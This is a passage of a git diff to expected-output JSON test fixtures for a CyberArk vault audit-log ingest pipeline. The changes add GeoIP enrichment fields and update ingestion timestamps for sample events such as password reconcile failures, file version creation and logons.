code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:04:27\",\"IsoTimestamp\":\"2021-03-15T13:04:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\n\",\"ExtraDetails\":\"address=67.43.156.15;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813465\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", @@ -883,6 +955,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, 
@@ -966,7 +1047,7 @@ "event": { "severity": 7, "reason": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", - "ingested": "2021-12-09T13:37:08.403111200Z", + "ingested": "2021-12-14T14:42:37.331274102Z", "original": "\u003c7\u003e1 2021-03-15T14:44:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:44:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:44:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=1;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615819476\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:44:37\",\"IsoTimestamp\":\"2021-03-15T14:44:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=1;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615819476\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "60", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log-expected.json index f9982edaafc..ce1d719a7e1 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log-expected.json @@ -7,6 +7,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -52,7 +61,7 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-12-09T13:37:09.726762400Z", + "ingested": "2021-12-14T14:42:38.882230862Z", "original": "\u003c5\u003e1 2021-03-10T09:11:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:54\",\"IsoTimestamp\":\"2021-03-10T09:11:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_localhost.localdomain.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" @@ -65,6 +74,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -110,7 +128,7 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-12-09T13:37:09.726766Z", + "ingested": "2021-12-14T14:42:38.882233938Z", "original": "\u003c5\u003e1 2021-03-10T17:58:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:58:05\",\"IsoTimestamp\":\"2021-03-10T17:58:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMNotifications\",\"File\":\"Root\\\\SessionControl\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" @@ -123,6 +141,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -168,7 +195,7 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-12-09T13:37:09.726770700Z", + "ingested": "2021-12-14T14:42:38.882234373Z", "original": "\u003c5\u003e1 2021-03-10T18:46:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:47\",\"IsoTimestamp\":\"2021-03-10T18:46:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSMServer.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" @@ -181,6 +208,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, 
@@ -226,7 +262,7 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-12-09T13:37:09.726776900Z", + "ingested": "2021-12-14T14:42:38.882234762Z", "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" 
@@ -285,7 +321,7 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-12-09T13:37:09.726781900Z", + "ingested": "2021-12-14T14:42:38.882235191Z", "original": "\u003c5\u003e1 2021-03-11T16:50:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:50:29\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:50:29Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e62\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePVWAAppUser\u003c/Issuer\u003e\\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\ec7c3e3bd11069dd20a491a6b11bbe293bf4780b\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:50:29\",\"IsoTimestamp\":\"2021-03-11T16:50:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File 
Version\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMSessions\",\"File\":\"Root\\\\ec7c3e3bd11069dd20a491a6b11bbe293bf4780b\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" @@ -298,6 +334,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -344,7 +389,7 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-12-09T13:37:09.726787Z", + "ingested": "2021-12-14T14:42:38.882235576Z", "original": "\u003c5\u003e1 2021-03-11T16:59:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:58\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:58Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e62\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:58\",\"IsoTimestamp\":\"2021-03-11T16:59:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File 
Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_VAGRANT.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" 
@@ -411,7 +456,7 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-12-09T13:37:09.726791100Z", + "ingested": "2021-12-14T14:42:38.882235975Z", "original": "\u003c5\u003e1 2021-03-14T12:07:32Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:07:32\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:07:32Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e62\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eAccountsFeedDiscoveryLogs\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Windows discovery from ELASTIC.local_PasswordManager_UID1.log\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:07:32\",\"IsoTimestamp\":\"2021-03-14T12:07:32Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File 
Version\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"AccountsFeedDiscoveryLogs\",\"File\":\"Root\\\\Windows discovery from ELASTIC.local_PasswordManager_UID1.log\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "62", "kind": "event" @@ -424,6 +469,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, 
@@ -470,7 +524,7 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-12-09T13:37:09.726796100Z", + "ingested": "2021-12-14T14:42:38.882236365Z", "original": "\u003c5\u003e1 2021-03-14T12:57:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e62\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_SSH.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:27\",\"IsoTimestamp\":\"2021-03-14T12:57:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File 
Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_SSH\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_SSH.LiveSessions\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log-expected.json index 7bace2e2b98..939caf252d9 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log-expected.json 
@@ -49,7 +49,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.420964800Z", + "ingested": "2021-12-14T14:42:39.755852613Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e7\u003c/MessageID\u003e\\n \u003cDesc\u003eLogon\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eadm2\u003c/Issuer\u003e\\n \u003cAction\u003eLogon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.2.0.6\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogon\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.2.0.3\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"adm2\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.2.0.6\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"10.2.0.3\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\"}}}", "code": "7", "kind": "event", 
